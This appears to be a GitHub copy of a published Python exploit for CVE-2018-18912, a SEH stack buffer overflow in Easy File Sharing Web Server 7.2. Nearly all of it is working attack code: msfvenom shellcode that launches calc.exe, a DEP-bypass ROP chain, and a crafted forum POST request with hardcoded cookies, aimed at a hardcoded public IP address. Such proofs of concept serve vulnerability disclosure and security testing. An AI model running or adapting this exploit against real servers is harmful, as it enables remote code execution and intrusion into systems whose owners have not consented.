Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
# Exploit Title: Easy File Sharing Web Server 7.2 - 'author' Remote Buffer Overflow (SEH)
# Date: November 5, 2018
# Exploit Author: Kristijan Antic
# Vendor Homepage: http://www.sharing-file.com/
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: 7.2
# Tested on: Windows 10.0.17134 x64
# CVE : CVE-2018-18912
# 1. Description: An issue was discovered in Easy File Sharing (EFS) Web Server 7.2,
# A stack-based buffer overflow vulnerability occurs when an authenticated user sends
# a malicious POST request to forum.ghp upon creating a new topic in
# the forums, which allows remote attackers to execute arbitrary code.
# 2. Proof of Concept
import socket
import struct
HOST = '81.82.253.190'
PORT = 81
def p32(v):
return struct.pack("<L", v)
def send_malformed_buffer(data):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.send(data)
s.close()
#msfvenom.bat -p windows/exec cmd=calc.exe -b '\xff\x2c\x00\x7e\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e\x3d\x25\x2b\x26' -v shellcode -f python
shellcode = ""
shellcode += "\x6a\x31\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73"
shellcode += "\x13\x90\xaa\xb9\xe4\x83\xeb\xfc\xe2\xf4\x6c\x42"
shellcode += "\x3b\xe4\x90\xaa\xd9\x6d\x75\x9b\x79\x80\x1b\xfa"
shellcode += "\x89\x6f\xc2\xa6\x32\xb6\x84\x21\xcb\xcc\x9f\x1d"
shellcode += "\xf3\xc2\xa1\x55\x15\xd8\xf1\xd6\xbb\xc8\xb0\x6b"
shellcode += "\x76\xe9\x91\x6d\x5b\x16\xc2\xfd\x32\xb6\x80\x21"
shellcode += "\xf3\xd8\x1b\xe6\xa8\x9c\x73\xe2\xb8\x35\xc1\x21"
shellcode += "\xe0\xc4\x91\x79\x32\xad\x88\x49\x83\xad\x1b\x9e"
shellcode += "\x32\xe5\x46\x9b\x46\x48\x51\x65\xb4\xe5\x57\x92"
shellcode += "\x59\x91\x66\xa9\xc4\x1c\xab\xd7\x9d\x91\x74\xf2"
shellcode += "\x32\xbc\xb4\xab\x6a\x82\x1b\xa6\xf2\x6f\xc8\xb6"
shellcode += "\xb8\x37\x1b\xae\x32\xe5\x40\x23\xfd\xc0\xb4\xf1"
shellcode += "\xe2\x85\xc9\xf0\xe8\x1b\x70\xf5\xe6\xbe\x1b\xb8"
shellcode += "\x52\x69\xcd\xc0\xb8\x69\x15\x18\xb9\xe4\x90\xfa"
shellcode += "\xd1\xd5\x1b\xc5\x3e\x1b\x45\x11\x49\x51\x32\xfc"
shellcode += "\xd1\x42\x05\x17\x24\x1b\x45\x96\xbf\x98\x9a\x2a"
shellcode += "\x42\x04\xe5\xaf\x02\xa3\x83\xd8\xd6\x8e\x90\xf9"
shellcode += "\x46\x31\xf3\xcb\xd5\x87\xbe\xcf\xc1\x81\x90\xaa"
shellcode += "\xb9\xe4"
# ---====GADGETS====---
ropnop = 0x1001a858
pop_eax_retn = 0x10015442
stack_pivot_addr = 0x10022869
pop_esi_retn = 0x1001c8e4
pop_ebx_retn = 0x10012F3C
pop_ecx_retn = 0x1001FC4C
neg_eax_retn = 0x100231cd
add_ebx_eax = 0x1001DA09
pop_edi_retn = 0x1001A648
xor_edx_edx = 0x10022C4C
inc_edx = 0x61c059a0
pop_ebp_retn = 0x1001add7
push_esp_retn = 0x61c24169
pushad_retn = 0x100240c2
ropchain = ''
buff = 'A' * 64
buff += 'BBBB' #nseh
buff += struct.pack("<L", stack_pivot_addr) #handler
buff += 'F' * 2348
ropchain += p32(pop_eax_retn)
ropchain += p32(0x61c832d0) #need to deref
ropchain += p32(0x1002248c) # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
ropchain += p32(0x61c18d81)
ropchain += p32(0x1001d626)
ropchain += p32(0x10021a3e)
#EBP = ReturnTo() rop gadget to push esp ret
ropchain += p32(pop_ebp_retn)
ropchain += p32(push_esp_retn)
#EDX = NewProtect(0x40)
ropchain += p32(xor_edx_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
#ECX = lpOldProtect (ptr to writable address address)
ropchain += p32(pop_ecx_retn)
ropchain += p32(0x61c730ad)
#EBX = dwSize()
ropchain += p32(pop_eax_retn)
ropchain += p32(0xFFFFFFFE)
ropchain += p32(neg_eax_retn)
ropchain += p32(add_ebx_eax)
#EDI = ROP NOP
ropchain += p32(pop_edi_retn)
ropchain += p32(ropnop)
#EAX = NOP (0x90909090)
ropchain += p32(pop_eax_retn)
ropchain += p32(0x10027010) #will inc one byte at this addr
ropchain += p32(pop_eax_retn)
ropchain += p32(0x90909090)
#PUSAH
ropchain += p32(pushad_retn)
ropchain += '\x90' * 4
ropchain += shellcode
buff += ropchain
request = ''
request += "POST /forum.ghp?forumid=1 HTTP/1.1\r\n"
request += "Host: 192.168.184.1\r\n"
request += "Content-Type: application/x-www-form-urlencoded\r\n"
request += "User-Agent: Mozilla/5.0\r\n"
request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\n"
request += "Accept-Language: en-US,en;q=0.9\r\n"
request += "Cookie: UserID=hacker; PassWD=hacker; frmUserName=; frmUserPass=; rememberPass=202%2C197%2C208%2C215%2C201; SESSIONID=14677\r\n"
request += "Connection: close\r\n"
request += "\r\n"
request += "author="+buff+"&passwd=hacker&title=bbbb&content=ffff&Submit=Submit\r\n"
send_malformed_buffer(request)